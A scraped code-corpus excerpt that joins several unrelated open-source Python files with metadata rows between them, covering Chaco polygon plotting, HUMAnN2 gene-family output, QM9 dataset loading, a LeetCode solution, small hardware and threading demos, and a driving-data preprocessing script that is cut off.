resp = self._client.transport.perform_request('GET', '/_ilm/policy/' + policy)
assert policy in resp
assert resp[policy]["policy"]["phases"]["hot"]["actions"]["rollover"]["max_size"] == "50gb"
assert resp[policy]["policy"]["phases"]["hot"]["actions"]["rollover"]["max_age"] == "30d"
def assert_docs_written_to_alias(self, alias, pattern=None):
# Refresh the indices to guarantee all documents are available
# through the _search API.
self._client.transport.perform_request('POST', '/_refresh')
if pattern is None:
pattern = self.default_pattern()
name = alias + "-" + pattern
data = self._client.transport.perform_request('GET', '/' + name + '/_search')
self.assertGreater(data["hits"]["total"]["value"], 0)
def default_pattern(self):
d = datetime.datetime.now().strftime("%Y.%m.%d")
return d + "-000001"
def index_for(self, alias, pattern=None):
if pattern is None:
pattern = self.default_pattern()
return "{}-{}".format(alias, pattern)
| 39.305085
| 99
| 0.618586
| 525
| 4,638
| 5.262857
| 0.2
| 0.057908
| 0.096272
| 0.131741
| 0.446978
| 0.411871
| 0.372059
| 0.355411
| 0.294607
| 0.198335
| 0
| 0.003158
| 0.24903
| 4,638
| 117
| 100
| 39.641026
| 0.790123
| 0.02997
| 0
| 0.282609
| 0
| 0
| 0.101224
| 0
| 0
| 0
| 0
| 0
| 0.23913
| 1
| 0.184783
| false
| 0.032609
| 0.043478
| 0.01087
| 0.271739
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
864d964c990a587e44dea52d446ea4e2f4b1a45e
| 6,340
|
py
|
Python
|
chaco/polygon_plot.py
|
burnpanck/chaco
|
6457cdd28625991ba69fbbee105051cab237aa51
|
[
"BSD-3-Clause"
] | 3
|
2017-09-17T17:32:06.000Z
|
2022-03-15T13:04:43.000Z
|
chaco/polygon_plot.py
|
burnpanck/chaco
|
6457cdd28625991ba69fbbee105051cab237aa51
|
[
"BSD-3-Clause"
] | null | null | null |
chaco/polygon_plot.py
|
burnpanck/chaco
|
6457cdd28625991ba69fbbee105051cab237aa51
|
[
"BSD-3-Clause"
] | 5
|
2015-05-17T16:08:11.000Z
|
2021-02-23T09:23:42.000Z
|
""" Defines the PolygonPlot class.
"""
from __future__ import with_statement
# Major library imports
import numpy as np
# Enthought library imports.
from enable.api import LineStyle, black_color_trait, \
transparent_color_trait
from kiva.agg import points_in_polygon
from traits.api import Enum, Float, Tuple, Property, cached_property, \
on_trait_change
# Local imports.
from base_xy_plot import BaseXYPlot
class PolygonPlot(BaseXYPlot):
""" Plots a polygon in dataspace.
Assuming that the index and value mappers are linear mappers, and that
"index" corresponds to X-coordinates and "value" corresponds to
Y-coordinates, the points are arranged in a counter-clockwise fashion.
The polygon is closed automatically, so there is no need to reproduce
the first point as the last point.
Nonlinear mappers are possible, but the results may be unexpected. Only the
data-space points are mapped in a nonlinear fashion. Straight lines
connecting them in a linear screen-space become curved in a nonlinear
screen-space; however, the drawing still contains straight lines in
screen-space.
If you don't want the edge of the polygon to be drawn, set **edge_color**
to transparent; don't try to do this by setting **edge_width** to 0. In
some drawing systems, such as PostScript, a line width of 0 means to make
the line as small as possible while still putting ink on the page.
"""
# The color of the line on the edge of the polygon.
edge_color = black_color_trait
# The thickness of the edge of the polygon.
edge_width = Float(1.0)
# The line dash style for the edge of the polygon.
edge_style = LineStyle
# The color of the face of the polygon.
face_color = transparent_color_trait
# Override the hittest_type trait inherited from BaseXYPlot
hittest_type = Enum("poly", "point", "line")
# The RGBA tuple for rendering edges. It is always a tuple of length 4.
# It has the same RGB values as edge_color_, and its alpha value is the
# alpha value of self.edge_color multiplied by self.alpha.
effective_edge_color = Property(Tuple, depends_on=['edge_color', 'alpha'])
# The RGBA tuple for rendering the face. It is always a tuple of length 4.
# It has the same RGB values as face_color_, and its alpha value is the
# alpha value of self.face_color multiplied by self.alpha.
effective_face_color = Property(Tuple, depends_on=['face_color', 'alpha'])
#----------------------------------------------------------------------
# Private 'BaseXYPlot' interface
#----------------------------------------------------------------------
def _gather_points(self):
""" Collects the data points that are within the bounds of the plot and
caches them.
"""
if self._cache_valid:
return
if not self.index or not self.value:
return
index = self.index.get_data()
value = self.value.get_data()
if len(index) == 0 or len(value) == 0 or len(index) != len(value):
self._cached_data_pts = []
self._cache_valid = True
return
points = np.transpose(np.array((index,value)))
self._cached_data_pts = points
self._cache_valid = True
def _render(self, gc, points):
""" Renders an Nx2 array of screen-space points as a polygon.
"""
with gc:
gc.clip_to_rect(self.x, self.y, self.width, self.height)
gc.set_stroke_color(self.effective_edge_color)
gc.set_line_width(self.edge_width)
gc.set_line_dash(self.edge_style_)
gc.set_fill_color(self.effective_face_color)
gc.lines(points)
gc.close_path()
gc.draw_path()
def _render_icon(self, gc, x, y, width, height):
""" Renders a representation of this plot as an icon into the box
defined by the parameters.
Used by the legend.
"""
with gc:
gc.set_stroke_color(self.effective_edge_color)
gc.set_line_width(self.edge_width)
gc.set_fill_color(self.effective_face_color)
if hasattr(self, 'line_style_'):
gc.set_line_dash(self.line_style_)
gc.draw_rect((x,y,width,height))
return
def hittest(self, screen_pt, threshold=7.0, return_distance=False):
""" Performs point-in-polygon testing or point/line proximity testing.
If self.hittest_type is "line" or "point", then behaves like the
parent class BaseXYPlot.hittest().
If self.hittest_type is "poly", then returns True if the given
point is inside the polygon, and False otherwise.
"""
if self.hittest_type in ("line", "point"):
return BaseXYPlot.hittest(self, screen_pt, threshold, return_distance)
data_pt = self.map_data(screen_pt, all_values=True)
index = self.index.get_data()
value = self.value.get_data()
poly = np.vstack((index,value)).T
return points_in_polygon([data_pt], poly)[0] == 1
#------------------------------------------------------------------------
# Event handlers
#------------------------------------------------------------------------
@on_trait_change('edge_color, edge_width, edge_style, face_color, alpha')
def _attributes_changed(self):
self.invalidate_draw()
self.request_redraw()
#------------------------------------------------------------------------
# Property getters
#------------------------------------------------------------------------
@cached_property
def _get_effective_edge_color(self):
if len(self.edge_color_) == 4:
edge_alpha = self.edge_color_[-1]
else:
edge_alpha = 1.0
c = self.edge_color_[:3] + (edge_alpha * self.alpha,)
return c
@cached_property
def _get_effective_face_color(self):
if len(self.face_color_) == 4:
face_alpha = self.face_color_[-1]
else:
face_alpha = 1.0
c = self.face_color_[:3] + (face_alpha * self.alpha,)
return c
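# Illustrative usage sketch (not part of the original module); building the
# renderer through Chaco's Plot/ArrayPlotData factory is one common route,
# though exact API details may vary across Chaco versions:
#
#     import numpy as np
#     from chaco.api import ArrayPlotData, Plot
#     pd = ArrayPlotData(x=np.array([0., 1., 1., 0.]),
#                        y=np.array([0., 0., 1., 1.]))
#     plot = Plot(pd)
#     plot.plot(("x", "y"), type="polygon", face_color="lightblue")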
| 36.647399
| 82
| 0.603312
| 828
| 6,340
| 4.43599
| 0.266908
| 0.031854
| 0.016335
| 0.013068
| 0.288048
| 0.166077
| 0.128233
| 0.128233
| 0.109992
| 0.109992
| 0
| 0.004871
| 0.255205
| 6,340
| 172
| 83
| 36.860465
| 0.772978
| 0.424606
| 0
| 0.3125
| 0
| 0
| 0.033682
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0875
| false
| 0
| 0.075
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86502380f0447c4c5893fb4c09f732239b1cc11f
| 552
|
py
|
Python
|
webapp/template_config.py
|
evgenyss/investing
|
b72da8587a4783bfdd389f1781dcd108d1a5e53f
|
[
"MIT"
] | null | null | null |
webapp/template_config.py
|
evgenyss/investing
|
b72da8587a4783bfdd389f1781dcd108d1a5e53f
|
[
"MIT"
] | null | null | null |
webapp/template_config.py
|
evgenyss/investing
|
b72da8587a4783bfdd389f1781dcd108d1a5e53f
|
[
"MIT"
] | null | null | null |
import os
from datetime import timedelta
basedir = os.path.abspath(os.path.dirname(__file__))
API_DATA_URL = "https://invest-public-api.tinkoff.ru/rest/tinkoff.public.invest.api.contract.v1.InstrumentsService/"
API_LASTPRICES_URL = "https://invest-public-api.tinkoff.ru/rest/\
tinkoff.public.invest.api.contract.v1.MarketDataService/GetLastPrices"
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, '..', 'webapp.db')
REMEMBER_COOKIE_DURATION = timedelta(days=1)
SQLALCHEMY_TRACK_MODIFICATIONS = False
SECRET_KEY = ""
API_TOKEN = ""
| 29.052632
| 116
| 0.778986
| 73
| 552
| 5.671233
| 0.589041
| 0.043478
| 0.067633
| 0.096618
| 0.328502
| 0.328502
| 0.328502
| 0.328502
| 0.328502
| 0.328502
| 0
| 0.005882
| 0.076087
| 552
| 18
| 117
| 30.666667
| 0.805882
| 0
| 0
| 0
| 0
| 0.090909
| 0.217391
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.181818
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8650d9e6c008eb69e8a60ee61bf0c6b0618f2c83
| 3,842
|
py
|
Python
|
humann2/quantify/families.py
|
dytk2134/humann2
|
9b8f212bdd910ee7187f06f1550f0c86bce0473b
|
[
"MIT"
] | null | null | null |
humann2/quantify/families.py
|
dytk2134/humann2
|
9b8f212bdd910ee7187f06f1550f0c86bce0473b
|
[
"MIT"
] | null | null | null |
humann2/quantify/families.py
|
dytk2134/humann2
|
9b8f212bdd910ee7187f06f1550f0c86bce0473b
|
[
"MIT"
] | null | null | null |
"""
HUMAnN2: quantify_families module
Compute alignments by gene family
Copyright (c) 2014 Harvard School of Public Health
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import os
import logging
import math
from .. import config
from .. import utilities
from .. import store
# name global logging instance
logger=logging.getLogger(__name__)
def gene_families(alignments,gene_scores,unaligned_reads_count):
"""
Compute the gene families from the alignments
"""
logger.debug("Compute gene families")
# Compute scores for each gene family for each bug set
alignments.convert_alignments_to_gene_scores(gene_scores)
# Process the gene id to names mappings
gene_names=store.Names(config.gene_family_name_mapping_file)
delimiter=config.output_file_column_delimiter
category_delimiter=config.output_file_category_delimiter
# Write the scores ordered with the top first
column_name=config.file_basename+"_Abundance-RPKs"
if config.remove_column_description_output:
column_name=config.file_basename
tsv_output=["# Gene Family"+delimiter+column_name]
# Add the unaligned reads count
tsv_output.append(config.unmapped_gene_name+delimiter+utilities.format_float_to_string(unaligned_reads_count))
# Print out the gene families with those with the highest scores first
for gene in gene_scores.gene_list_sorted_by_score("all"):
all_score=gene_scores.get_score("all",gene)
if all_score>0:
gene_name=gene_names.get_name(gene)
# Print the computation of all bugs for gene family
tsv_output.append(gene_name+delimiter+utilities.format_float_to_string(all_score))
# Process and print per bug if selected
if not config.remove_stratified_output:
# Print scores per bug for family ordered with those with the highest values first
scores_by_bug=gene_scores.get_scores_for_gene_by_bug(gene)
for bug in utilities.double_sort(scores_by_bug):
if scores_by_bug[bug]>0:
tsv_output.append(gene_name+category_delimiter+bug+delimiter
+utilities.format_float_to_string(scores_by_bug[bug]))
if config.output_format=="biom":
# Open a temp file if a conversion to biom is selected
tmpfile=utilities.unnamed_temp_file()
file_handle=open(tmpfile,'w')
file_handle.write("\n".join(tsv_output))
file_handle.close()
utilities.tsv_to_biom(tmpfile,config.genefamilies_file,"Gene")
else:
# Write output as tsv format
file_handle = open(config.genefamilies_file, "w")
file_handle.write("\n".join(tsv_output))
file_handle.close()
return config.genefamilies_file
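# Illustrative call sketch (not part of the original module); `alignments` and
# `gene_scores` are HUMAnN2 store objects built earlier in the pipeline:
#
#     genefamilies_file = gene_families(alignments, gene_scores,
#                                       unaligned_reads_count=0)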
| 40.442105
| 116
| 0.728267
| 534
| 3,842
| 5.050562
| 0.346442
| 0.032629
| 0.016314
| 0.032258
| 0.132369
| 0.08046
| 0.066741
| 0.066741
| 0.03337
| 0.03337
| 0
| 0.002313
| 0.212389
| 3,842
| 94
| 117
| 40.87234
| 0.888962
| 0.442998
| 0
| 0.1
| 0
| 0
| 0.032764
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025
| false
| 0
| 0.15
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865144cd196eb39a73555fc643c117d083a615cc
| 744
|
py
|
Python
|
Buta Nicolae/threads.py
|
RazvanBalau/parallel-2020
|
bd9c0dea6cc70e167320f64632d7a235522dfdb3
|
[
"MIT"
] | null | null | null |
Buta Nicolae/threads.py
|
RazvanBalau/parallel-2020
|
bd9c0dea6cc70e167320f64632d7a235522dfdb3
|
[
"MIT"
] | null | null | null |
Buta Nicolae/threads.py
|
RazvanBalau/parallel-2020
|
bd9c0dea6cc70e167320f64632d7a235522dfdb3
|
[
"MIT"
] | 23
|
2020-01-15T15:02:39.000Z
|
2020-01-15T17:23:03.000Z
|
import threading
from multiprocessing import Queue
results = []
results2 = []
def take_numbers(q):
print('Enter the numbers:')
for i in range(0,3):
num1 = int(input('Enter first number: '))
num2 = int(input('Enter second number: '))
q.put(num1)
q.put(num2)
def add_num(q):
for i in range(0,3):
num1 = q.get()
num2 = q.get()
results.append(num1+num2)
results2.append(num1-num2)
q = Queue()
t2 = threading.Thread(target=add_num, args=(q, ))
t1 = threading.Thread(target=take_numbers, args=(q, ))
t2.start()
t1.start()
t2.join()
t1.join()
q.close()
for result in results:
print("sum =", result)   # original output label: "adunare" (addition)
for result in results2:
print("difference =", result)   # original output label: "scadere" (subtraction)
| 20.666667
| 54
| 0.606183
| 106
| 744
| 4.216981
| 0.40566
| 0.049217
| 0.026846
| 0.049217
| 0.076063
| 0.076063
| 0.076063
| 0
| 0
| 0
| 0
| 0.040636
| 0.239247
| 744
| 36
| 55
| 20.666667
| 0.749117
| 0
| 0
| 0.068966
| 0
| 0
| 0.103356
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.068966
| 0
| 0.137931
| 0.103448
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86517e62e82db5794921e6da0e41993351344585
| 576
|
py
|
Python
|
code_week11_76_712/unique_paths.py
|
dylanlee101/leetcode
|
b059afdadb83d504e62afd1227107de0b59557af
|
[
"Apache-2.0"
] | null | null | null |
code_week11_76_712/unique_paths.py
|
dylanlee101/leetcode
|
b059afdadb83d504e62afd1227107de0b59557af
|
[
"Apache-2.0"
] | null | null | null |
code_week11_76_712/unique_paths.py
|
dylanlee101/leetcode
|
b059afdadb83d504e62afd1227107de0b59557af
|
[
"Apache-2.0"
] | null | null | null |
'''
A robot is located at the top-left corner of an m x n grid (marked "Start" in the diagram below).
The robot can only move either down or right at each step. The robot is trying to reach
the bottom-right corner of the grid (marked "Finish" in the diagram below).
How many distinct paths are there in total?
For example, the diagram above shows a 7 x 3 grid. How many possible paths are there?
Example 1:
Input: m = 3, n = 2
Output: 3
Explanation:
Starting from the top-left corner, there are 3 paths in total to the bottom-right corner.
1. Right -> Right -> Down
2. Right -> Down -> Right
3. Down -> Right -> Right
Example 2:
Input: m = 7, n = 3
Output: 28
Source: LeetCode (LeetCode-CN)
Link: https://leetcode-cn.com/problems/unique-paths
'''
class Solution:
def uniquePaths(self, m: int, n: int) -> int:
dp = [1] + [0] * n
for i in range(m):
for j in range(n):
dp[j] = dp[j] + dp[j-1]
return dp[-2]
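# Examples from the problem statement above:
#     Solution().uniquePaths(3, 2)  # -> 3
#     Solution().uniquePaths(7, 3)  # -> 28
# Note: dp[j] counts paths into column j of the current row; the trailing 0
# lets dp[j-1] read 0 (via dp[-1]) when j == 0, and dp[-2] is column n-1.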
| 15.567568
| 49
| 0.552083
| 98
| 576
| 3.244898
| 0.55102
| 0.028302
| 0.031447
| 0.037736
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045673
| 0.277778
| 576
| 37
| 50
| 15.567568
| 0.71875
| 0.616319
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86524c143ea8ba1817f21135f1c0c27360fa74e8
| 3,361
|
py
|
Python
|
spektral/datasets/qm9.py
|
JonaBecher/spektral
|
ff59e16d959e0ec698428997363be20462625699
|
[
"MIT"
] | 2,145
|
2019-01-21T20:49:44.000Z
|
2022-03-28T20:27:27.000Z
|
spektral/datasets/qm9.py
|
jasper-park/spektral
|
ad2d96549c00f68ce992a7d29e2c3fd025fb529b
|
[
"MIT"
] | 259
|
2019-01-22T05:18:19.000Z
|
2022-03-25T10:46:10.000Z
|
spektral/datasets/qm9.py
|
jasper-park/spektral
|
ad2d96549c00f68ce992a7d29e2c3fd025fb529b
|
[
"MIT"
] | 322
|
2019-02-11T16:18:27.000Z
|
2022-03-24T16:26:59.000Z
|
import os
import os.path as osp
import numpy as np
from joblib import Parallel, delayed
from tensorflow.keras.utils import get_file
from tqdm import tqdm
from spektral.data import Dataset, Graph
from spektral.utils import label_to_one_hot, sparse
from spektral.utils.io import load_csv, load_sdf
ATOM_TYPES = [1, 6, 7, 8, 9]
BOND_TYPES = [1, 2, 3, 4]
class QM9(Dataset):
"""
The QM9 chemical data set of small molecules.
In this dataset, nodes represent atoms and edges represent chemical bonds.
There are 5 possible atom types (H, C, N, O, F) and 4 bond types (single,
double, triple, aromatic).
Node features represent the chemical properties of each atom and include:
- The atomic number, one-hot encoded;
- The atom's position in the X, Y, and Z dimensions;
- The atomic charge;
- The mass difference from the monoisotope;
The edge features represent the type of chemical bond between two atoms,
one-hot encoded.
Each graph has a 19-dimensional label for regression.
**Arguments**
- `amount`: int, load this many molecules instead of the full dataset
(useful for debugging).
- `n_jobs`: number of CPU cores to use for reading the data (-1, to use all
available cores).
"""
url = "https://deepchemdata.s3-us-west-1.amazonaws.com/datasets/gdb9.tar.gz"
def __init__(self, amount=None, n_jobs=1, **kwargs):
self.amount = amount
self.n_jobs = n_jobs
super().__init__(**kwargs)
def download(self):
get_file(
"qm9.tar.gz",
self.url,
extract=True,
cache_dir=self.path,
cache_subdir=self.path,
)
os.remove(osp.join(self.path, "qm9.tar.gz"))
def read(self):
print("Loading QM9 dataset.")
sdf_file = osp.join(self.path, "gdb9.sdf")
data = load_sdf(sdf_file, amount=self.amount) # Internal SDF format
def read_mol(mol):
x = np.array([atom_to_feature(atom) for atom in mol["atoms"]])
a, e = mol_to_adj(mol)
return x, a, e
data = Parallel(n_jobs=self.n_jobs)(
delayed(read_mol)(mol) for mol in tqdm(data, ncols=80)
)
x_list, a_list, e_list = list(zip(*data))
# Load labels
labels_file = osp.join(self.path, "gdb9.sdf.csv")
labels = load_csv(labels_file)
labels = labels.set_index("mol_id").values
if self.amount is not None:
labels = labels[: self.amount]
return [
Graph(x=x, a=a, e=e, y=y)
for x, a, e, y in zip(x_list, a_list, e_list, labels)
]
def atom_to_feature(atom):
atomic_num = label_to_one_hot(atom["atomic_num"], ATOM_TYPES)
coords = atom["coords"]
charge = atom["charge"]
iso = atom["iso"]
return np.concatenate((atomic_num, coords, [charge, iso]), -1)
def mol_to_adj(mol):
row, col, edge_features = [], [], []
for bond in mol["bonds"]:
start, end = bond["start_atom"], bond["end_atom"]
row += [start, end]
col += [end, start]
edge_features += [bond["type"]] * 2
a, e = sparse.edge_index_to_matrix(
edge_index=np.array((row, col)).T,
edge_weight=np.ones_like(row),
edge_features=label_to_one_hot(edge_features, BOND_TYPES),
)
return a, e
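# Illustrative usage sketch (not part of the original module); the first call
# downloads and unpacks the dataset:
#
#     dataset = QM9(amount=100, n_jobs=1)  # read only the first 100 molecules
#     graph = dataset[0]                   # a spektral.data.Graph with x, a, e, y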
| 29.482456
| 80
| 0.621839
| 497
| 3,361
| 4.060362
| 0.352113
| 0.014866
| 0.014866
| 0.019326
| 0.040634
| 0.040634
| 0.025768
| 0
| 0
| 0
| 0
| 0.011722
| 0.26391
| 3,361
| 113
| 81
| 29.743363
| 0.803961
| 0.249331
| 0
| 0
| 0
| 0.015152
| 0.078215
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.136364
| 0
| 0.318182
| 0.015152
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865416b109055549efa6918ca6073abc6d07a490
| 602
|
py
|
Python
|
code/Level 1 - Intro to CPX/5-acceleration/main.py
|
tscofield/cpx-training
|
682a2cef6bb164bc7c374744de94c21581258392
|
[
"MIT"
] | null | null | null |
code/Level 1 - Intro to CPX/5-acceleration/main.py
|
tscofield/cpx-training
|
682a2cef6bb164bc7c374744de94c21581258392
|
[
"MIT"
] | null | null | null |
code/Level 1 - Intro to CPX/5-acceleration/main.py
|
tscofield/cpx-training
|
682a2cef6bb164bc7c374744de94c21581258392
|
[
"MIT"
] | 1
|
2019-02-07T04:04:05.000Z
|
2019-02-07T04:04:05.000Z
|
from adafruit_circuitplayground.express import cpx
# Main loop gets x, y and z axis acceleration, prints the values, and turns on
# red, green and blue, at levels related to the x, y and z values.
while True:
if cpx.switch:
print("Slide switch off!")
cpx.pixels.fill((0, 0, 0))
continue
else:
R = 0
G = 0
B = 0
x, y, z = cpx.acceleration
print((x, y, z))
if x:
R = R + abs(int(x))
if y:
G = G + abs(int(y))
if z:
B = B + abs(int(z))
cpx.pixels.fill((R, G, B))
| 25.083333
| 78
| 0.503322
| 94
| 602
| 3.212766
| 0.468085
| 0.02649
| 0.033113
| 0.039735
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016129
| 0.38206
| 602
| 23
| 79
| 26.173913
| 0.795699
| 0.234219
| 0
| 0
| 0
| 0
| 0.037199
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.052632
| 0.105263
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86543345af40c82152fa05b0f713964bb091299c
| 7,692
|
py
|
Python
|
src/data_preprocess.py
|
QinganZhao/ML-based-driving-motion-prediction
|
5a7772cf199d30e4e33bbe943775c2e19aac5d5b
|
[
"MIT"
] | 18
|
2019-01-08T02:53:56.000Z
|
2022-03-03T11:34:20.000Z
|
src/data_preprocess.py
|
QinganZhao/ML-based-driving-motion-prediction
|
5a7772cf199d30e4e33bbe943775c2e19aac5d5b
|
[
"MIT"
] | null | null | null |
src/data_preprocess.py
|
QinganZhao/ML-based-driving-motion-prediction
|
5a7772cf199d30e4e33bbe943775c2e19aac5d5b
|
[
"MIT"
] | 7
|
2018-06-13T20:12:25.000Z
|
2022-02-20T08:39:07.000Z
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
import matplotlib.patches as patches
def load_data(file_name, car_flag):
if car_flag == 1:
data = np.loadtxt('./car1/'+str(file_name))
elif car_flag == 2:
data = np.loadtxt('./car2/'+str(file_name))
else:
raise ValueError("car_flag must be 1 (main-lane car) or 2 (merging car)")
return data
def get_low_freq_data(data):
"""
Return a data matrix with 0.1s per time step data. (from 0.01s data)
"""
matrix = np.zeros((1, data.shape[1]))
for i in range(data.shape[0]):
if i % 10 == 0:
matrix = np.concatenate((matrix, data[i,:].reshape(1,data.shape[1])),axis=0)
return matrix[1:,:]
def data_process():
"""
This function serves to concatenate the information of two cars into one array.
Note: car1 -- mainlane car;
car2 -- merging car;
OutFormat:
0 case_ID
1 frame_ID
2 car1_long_pos
3 car1_long_vel
4 car1_lateral_pos
5 car1_lateral_displacement
6 car2_long_pos
7 car2_long_vel
8 car2_lateral_pos
9 car2_lateral_displacement
10 relative_long_vel (merge - mainlane)
11 relative_lateral_distance (merge - mainlane)
12 relative_long_distance (merge - mainlane)
13 car1_yaw
14 car2_yaw
15 situation label: (0: car1 yields car2; 1: car2 yields car1)
"""
data_matrix = np.zeros((1,16))
for i in range(128):
file_name_1 = 'data_'+str(i)+'_1.txt'
file_name_2 = 'data_'+str(i)+'_2.txt'
car1 = get_low_freq_data(load_data(file_name_1, 1))
car2 = get_low_freq_data(load_data(file_name_2, 2))
T = int(car1.shape[0])
#print(T)
current_data_matrix = np.zeros((T,16))
for j in range(1, T):
current_data_matrix[j,0] = i
current_data_matrix[j,1] = j
current_data_matrix[j,2] = car1[j,1]
current_data_matrix[j,3] = 10 * (car1[j,1] - car1[j-1,1])
current_data_matrix[j,4] = car1[j,2]
current_data_matrix[j,5] = car1[j,2] - car1[j-1,2]
current_data_matrix[j,6] = car2[j,1]
current_data_matrix[j,7] = 10 * (car2[j,1] - car2[j-1,1])
current_data_matrix[j,8] = car2[j,2]
current_data_matrix[j,9] = car2[j,2] - car2[j-1,2]
current_data_matrix[j,10] = current_data_matrix[j,7] - current_data_matrix[j,3]
current_data_matrix[j,11] = current_data_matrix[j,8] - current_data_matrix[j,4]
current_data_matrix[j,12] = current_data_matrix[j,6] - current_data_matrix[j,2]
current_data_matrix[j,13] = car1[j,3]
current_data_matrix[j,14] = car2[j,3]
if car1[-1,1] > car2[-1,1]:
current_data_matrix[j,15] = 1
else:
current_data_matrix[j,15] = 0
current_data_matrix = current_data_matrix[1:, :]
data_matrix = np.concatenate((data_matrix, current_data_matrix),axis=0)
np.savetxt('./data_matrix.txt', data_matrix[1:,:],'%.4f')
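# Illustrative only (not part of the original script): reading the matrix
# written above and slicing out one case, using the column layout documented
# in data_process():
#     m = np.loadtxt('./data_matrix.txt')
#     case0 = m[m[:, 0] == 0]   # all frames of case_ID 0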
##################################################################
def divide_data(data_matrix, segment_length):
"""
This function serves to separate two situation cases.
"""
situation0_data = data_matrix[np.where(data_matrix[:,-1] == 0)]
situation1_data = data_matrix[np.where(data_matrix[:,-1] == 1)]
np.savetxt('./all_trajs_1.txt', situation0_data, '%.4f')
np.savetxt('./all_trajs_2.txt', situation1_data, '%.4f')
# count seq lengths
# separate sequence segments
# all_trajs_seg_1 = np.zeros((1, data_matrix.shape[1]))
# all_trajs_seg_2 = np.zeros((1, data_matrix.shape[1]))
all_trajs_1 = np.zeros((1, data_matrix.shape[1]))
all_trajs_2 = np.zeros((1, data_matrix.shape[1]))
count0, count1 = [], []
# for i in range(128):
# print('i = '+str(i))
# temp_data = data_matrix[np.where(data_matrix[:,0] == i)]
# if temp_data[0,-1] == 0:
# for j in range(temp_data.shape[0]-segment_length+1):
# temp_seg_data = temp_data[j:j+segment_length, :]
# count0.append(temp_seg_data.shape[0])
# all_trajs_seg_1 = np.concatenate((all_trajs_seg_1, temp_seg_data),axis=0)
# else:
# for j in range(temp_data.shape[0]-segment_length+1):
# temp_seg_data = temp_data[j:j+segment_length, :]
# count1.append(temp_seg_data.shape[0])
# all_trajs_seg_2 = np.concatenate((all_trajs_seg_2, temp_seg_data),axis=0)
for i in range(128):
print('i = '+str(i))
temp_data = data_matrix[np.where(data_matrix[:,0] == i)]
if temp_data[0,-1] == 0:
count0.append(temp_data.shape[0])
all_trajs_1 = np.concatenate((all_trajs_1, temp_data),axis=0)
elif temp_data[0,-1] == 1:
count1.append(temp_data.shape[0])
